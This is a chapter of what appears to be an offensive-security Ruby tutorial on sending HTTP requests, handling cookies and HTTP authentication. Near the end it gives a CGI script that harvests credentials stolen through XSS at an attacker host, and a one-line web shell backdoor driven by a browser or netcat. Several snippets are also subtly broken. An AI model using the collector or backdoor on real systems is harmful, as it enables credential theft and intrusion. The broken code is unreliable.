Module 0x4 | Web Kung Fu

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee
Search…
Send Get request
Using Net::HTTP
1
#!/usr/bin/env ruby
2
# KING SABRI
3
# Usage | ruby send_get.rb [HOST] [SESSION_ID]
4
#
5
require "net/http"
6
​
7
host       = ARGV[0] || "172.16.50.139"
8
session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
9
​
10
def send_sqli(query)
11
​
12
  uri = URI.parse("https://#{host}/script/path/file.php?")
13
  uri.query = URI.encode_www_form({"var1"=> "val1",
14
                                   "var2"=> "val2",
15
                                   "var3"=> "val3"})
16
​
17
  http = Net::HTTP.new(uri.host, uri.port)
18
  http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
19
​
20
  request = Net::HTTP::Get.new(uri.request_uri)
21
  request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
22
  request["Connection"] = "keep-alive"
23
  request["Accept-Language"] = "en-US,en;q=0.5"
24
  request["Accept-Encoding"] = "gzip, deflate"
25
  request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
26
  request["PHPSESSID"] = session_id
27
​
28
  begin
29
    puts "Sending.. "
30
    response = http.request(request).body
31
  rescue Exception => e
32
    puts "[!] Failed!"
33
    puts e
34
  end
35
​
36
end
Copied!
Simple Shortened URL extractor
urlextractor.rb
1
#!/usr/bin/env ruby
2
require 'net/http'
3
uri = ARGV[0]
4
loop do
5
  puts uri
6
  res = Net::HTTP.get_response URI uri
7
  if !res['location'].nil?
8
    uri = res['location']
9
  else
10
    break
11
  end
12
end
Copied!
Run it
1
$ruby urlextractor.rb http://bit.ly/1JSs7vj
2
http://bit.ly/1JSs7vj
3
http://ow.ly/XLGfi
4
https://tinyurl.com/hg69vgm
5
http://rubyfu.net
Copied!
Ok, what if I gave you this shortened url(http://short-url.link/f2a)? try the above script and tell me what's going-on
Using Open-uri
Here another way to do the same thing
1
#!/usr/bin/env ruby
2
require 'open-uri'
3
require 'openssl'
4
​
5
host       = ARGV[0] || "172.16.50.139"
6
session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
7
​
8
​
9
def send_sqli
10
  uri = URI.parse("https://#{host}/script/path/file.php?var1=val1&var2=val2&var3=val3")
11
  headers =
12
      {
13
        "User-Agent" => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
14
        "Connection" => "keep-alive",
15
        "Accept-Language" => "en-US,en;q=0.5",
16
        "Accept-Encoding" => "gzip, deflate",
17
        "Accept" => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
18
        "Cookie" => "PHPSESSID=#{session_id}"
19
      }
20
  request = open(uri, :ssl_verify_mode => OpenSSL::SSL::VERIFY_NONE, headers)
21
  puts "Sending.. "
22
  response = request.read
23
  puts response
24
end
Copied!
Send HTTP Post request with custom headers
Here the post body from a file
1
require 'net/http'
2
​
3
uri = URI.parse "http://example.com/Pages/PostPage.aspx"
4
headers =
5
{
6
   'Referer' => 'http://example.com/Pages/SomePage.aspx',
7
   'Cookie' => 'TS9e4B=ae79efe; WSS_FullScrende=false; ASP.NET_SessionId=rxuvh3l5dam',
8
   'Connection' => 'keep-alive',
9
   'Content-Type' =>'application/x-www-form-urlencoded'
10
 }
11
post = File.read post_file   # Raw Post Body's Data
12
http    = Net::HTTP.new(uri.host, uri.port)
13
http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
14
request = Net::HTTP::Post.new(uri.path, headers)
15
request.body = post
16
response = http.request request
17
puts response.code
18
puts response.body
Copied!
More control on Post variables
Let's to take the following form as a simple post form to mimic in our script
​
​
Figure 1. Simple Post form
Post form code:
1
<FORM METHOD=POST ACTION="http://wwwx.cs.unc.edu/~jbs/aw-wwwp/docs/resources/perl/perl-cgi/programs/cgi_stdin.cgi">
2
​
3
    <P>Name field: <INPUT TYPE="text" Name="name" SIZE=30 VALUE = "You name">
4
    <P>Name field: <TEXTAREA TYPE="textarea" ROWS=5 COLS=30 Name="textarea">Your comment.</TEXTAREA>
5
​
6
    <P>Your age: <INPUT TYPE="radio" NAME="radiobutton" VALUE="youngun"> younger than 21,
7
    <INPUT TYPE="radio" NAME="radiobutton" VALUE="middleun" CHECKED> 21 -59,
8
    <INPUT TYPE="radio" NAME="radiobutton" VALUE="oldun"> 60 or older
9
​
10
    <P>Things you like:
11
    <INPUT TYPE="checkbox" NAME="checkedbox" VALUE="pizza" CHECKED>pizza,
12
    <INPUT TYPE="checkbox" NAME="checkedbox" VALUE="hamburgers" CHECKED>hamburgers,
13
    <INPUT TYPE="checkbox" NAME="checkedbox" VALUE="spinich">spinich,
14
    <INPUT TYPE="checkbox" NAME="checkedbox" VALUE="mashed potatoes" CHECKED>mashed potatoes
15
​
16
    <P>What you like most:
17
    <SELECT NAME="selectitem">
18
        <OPTION>pizza<OPTION>hamburgers<OPTION SELECTED>spinich<OPTION>mashed potatoes<OPTION>other
19
    </SELECT>
20
​
21
    <P>Reset: <INPUT TYPE="reset" >
22
​
23
    <P>Submit: <INPUT TYPE="submit" NAME="submitbutton" VALUE="Do it!" ACTION="SEND">
24
</FORM>
Copied!
We need to send a Post request as the form figure 1 would do with control on each value and variable.
1
require "net/http"
2
require "uri"
3
​
4
# Parsing the URL and instantiate http
5
uri = URI.parse("http://wwwx.cs.unc.edu/~jbs/aw-wwwp/docs/resources/perl/perl-cgi/programs/cgi_stdin.cgi")
6
http = Net::HTTP.new(uri.host, uri.port)
7
http.use_ssl = true if uri.scheme == 'https'    # Enable HTTPS support if it's HTTPS
8
​
9
# Instantiate HTTP Post request
10
request = Net::HTTP::Post.new(uri.request_uri)
11
​
12
# Headers
13
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
14
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0"
15
request["Referer"] = "http://www.cs.unc.edu/~jbs/resources/perl/perl-cgi/programs/form1-POST.html"
16
request["Connection"] = "keep-alive"
17
request["Accept-Language"] = "en-US,en;q=0.5"
18
request["Accept-Encoding"] = "gzip, deflate"
19
request["Content-Type"] = "application/x-www-form-urlencoded"
20
​
21
# Post body
22
request.set_form_data({
23
                          "name"         => "My title is here",
24
                          "textarea"     => "My grate message here.",
25
                          "radiobutton"  => "middleun",
26
                          "checkedbox"   => "pizza",
27
                          "checkedbox"   => "hamburgers",
28
                          "checkedbox"   => "mashed potatoes",
29
                          "selectitem"   => "hamburgers",
30
                          "submitbutton" => "Do it!"
31
                      })
32
​
33
# Receive the response
34
response = http.request(request)
35
​
36
puts "Status code: " + response.code
37
puts "Response body: " + response.body
Copied!
You can use body method instead of set_form_data to avoid auto-encoding for any reason
1
request.body = "name=My title is here&textarea=My grate message here.&radiobutton=middleun&checkedbox=pizza&checkedboxhamburgers&checkedbox=mashed potatoes&selectitem=hamburgers&submitbutton=Do it!"
Copied!
Dealing with Cookies
Some times you need to deal with some actions after authentication. Ideally, it's all about cookies.
Notes:
To Read cookies you need to get set-cookie from response
To Set cookies you need to set Cookie to request
1
puts "[*] Logging-in"
2
uri1 = URI.parse("http://host/login.aspx")
3
uri2 = URI.parse("http://host/report.aspx")
4
​
5
Net::HTTP.start(uri1.host, uri1.port) do |http|
6
  http.use_ssl = true if uri1.scheme == 'https'    # Enable HTTPS support if it's HTTPS
7
  puts "[*] Logging in"
8
  p_request  = Net::HTTP::Post.new(uri1)
9
  p_request.set_form_data({"loginName"=>"admin", "password"=>"[email protected]"})
10
  p_response = http.request(p_request)
11
  cookies    = p_response.response['set-cookie']    # Save Cookies
12
​
13
  puts "[*] Do Post-authentication actions"
14
  Net::HTTP::Get.new(uri2)
15
  g_request  = Net::HTTP::Get.new(uri2)
16
  g_request['Cookie'] = cookies                     # Restore Saved Cookies
17
  g_response = http.request(g_request)
18
end
Copied!
HTTP authentication (Basic, Digest, NTLM)
Basic authentication
1
require 'net/http'
2
​
3
username = "Admin"
4
password = "[email protected]"
5
uri      = URI("http://rubyfu.net/login")
6
​
7
http = http = Net::HTTP.new(uri.host, uri.port)
8
req  = Net::HTTP::Get.new(uri)
9
req.basic_auth username, password
10
res  = http.request(req)
11
​
12
puts res.body
Copied!
Digest authentication
Install net-http-digest_auth gem
1
gem install net-http-digest_auth
Copied!
1
require 'ntlm/http'
2
require 'net/http/digest_auth'
3
​
4
uri          = URI("http://rubyfu.net/login")
5
uri.user     = "Admin"
6
uri.password = "[email protected]"
7
​
8
http = Net::HTTP.new(uri.host, uri.port)
9
digest_auth = Net::HTTP::DigestAuth.new
10
req  = Net::HTTP::Get.new(uri)
11
auth = digest_auth.auth_header uri, res['www-authenticate'], 'GET'
12
req.add_field 'Authorization', auth
13
res  = http.request(request)
14
​
15
puts res.body
Copied!
Here is an example to build it without external gem
NTLM authentication
Install ntlm gem
1
gem install ruby-ntlm
Copied!
Note: ntlm gem works with http, imap, smtp protocols. Read more.
1
require 'ntlm/http'
2
​
3
username = "Admin"
4
password = "[email protected]"
5
uri      = URI("http://rubyfu.net/login")
6
​
7
http = http = Net::HTTP.new(uri.host, uri.port)
8
req  = Net::HTTP::Get.new(uri)
9
req.ntlm_auth usernamen, password
10
res  = http.request(request)
11
​
12
puts res.body
Copied!
CGI
Get info - from XSS/HTMLi exploitation
When you exploit XSS or HTML injection you may need to receive the grepped data from exploited user to your external server. Here a simple example of CGI script take sent get request from fake login from that asks users to enter log-in with username and password then will store the data to hacked_login.txt text file and fix its permissions to assure that nobody can access that file from public.
Add the following to /etc/apache2/sites-enabled/[SITE] then restart the service
1
<Directory /var/www/[CGI FOLDER]>
2
        AddHandler cgi-script .rb
3
        Options +ExecCGI
4
</Directory>
Copied!
Now, put the script in /var/www/[CGI FOLDER]. You can use it now.
1
#!/usr/bin/ruby
2
# CGI script gets user/pass | http://attacker/info.rb?user=USER&pass=PASS
3
require 'cgi'
4
require 'uri'
5
​
6
cgi  = CGI.new
7
cgi.header  # content type 'text/html'
8
user = URI.encode cgi['user']
9
pass = URI.encode cgi['pass']
10
time = Time.now.strftime("%D %T")
11
​
12
file = 'hacked_login.txt'
13
File.open(file, "a") do |f|
14
  f.puts time   # Time of receiving the get request
15
  f.puts "#{URI.decode user}:#{URI.decode pass}"    # The data
16
  f.puts cgi.remote_addr    # Remote user IP
17
  f.puts cgi.referer    # The vulnerable site URL
18
  f.puts "---------------------------"
19
end
20
File.chmod(0200, file)  # To prevent public access to the log file
21
​
22
puts ""
Copied!
Web Shell - command execution via GET
if you have a server that supports ruby CGI, you can use the following as backdoor
1
#!/usr/bin/env ruby
2
require 'cgi'
3
cgi = CGI.new
4
puts cgi.header
5
system(cgi['cmd'])
Copied!
Now you can simply use a web browser, Netcat or WebShellConsole to execute your commands. ex. Browser
1
http://host/cgi/shell.rb?cmd=ls -la
Copied!
Netcat
1
echo "GET /cgi/shell.rb?cmd=ls%20-la" | nc host 80
Copied!
WebShellConsole (repository)
run wsc
1
ruby wsc.rb
Copied!
Add Shell URL
1
Shell -> set http://host/cgi/shell.rb?cmd=
Copied!
Now prompt your commands
1
Shell -> ls -la
Copied!
Mechanize
Since we're talking about dealing with web in ruby, we can't forget Mechanize gem, the most known library for dealing wit web.
The Official description says, the Mechanize library is used for automating interaction with websites. Mechanize automatically stores and sends cookies, follows redirects, and can follow links and submit forms. Form fields can be populated and submitted. Mechanize also keeps track of the sites that you have visited as a history.
More about Mechanize gem
​Getting Started With Mechanize​
​Mechanize examples​
​RailsCasts | Mechanize tutorial​
Since you know the hard way, you'll find Mechanize as simple as mouse clicks! give it a try!
HTTP.rb
HTTP (The Gem! a.k.a. http.rb) is an easy-to-use client library for making requests from Ruby. It uses a simple method chaining system for building requests, similar to Python's Requests.
Under the hood, http.rb uses http_parser.rb, a fast HTTP parsing native extension based on the Node.js parser and a Java port thereof. This library isn't just yet another wrapper around Net::HTTP. It implements the HTTP protocol natively and outsources the parsing to native extensions.
More about http.rb gem
​The Official repository​
​The official wiki​
​CGI Examples​
AMQP
SQL Injection Scanner
Last modified 2yr ago
Copy link
Contents
Send Get request
Using Net::HTTP
Using Open-uri
Send HTTP Post request with custom headers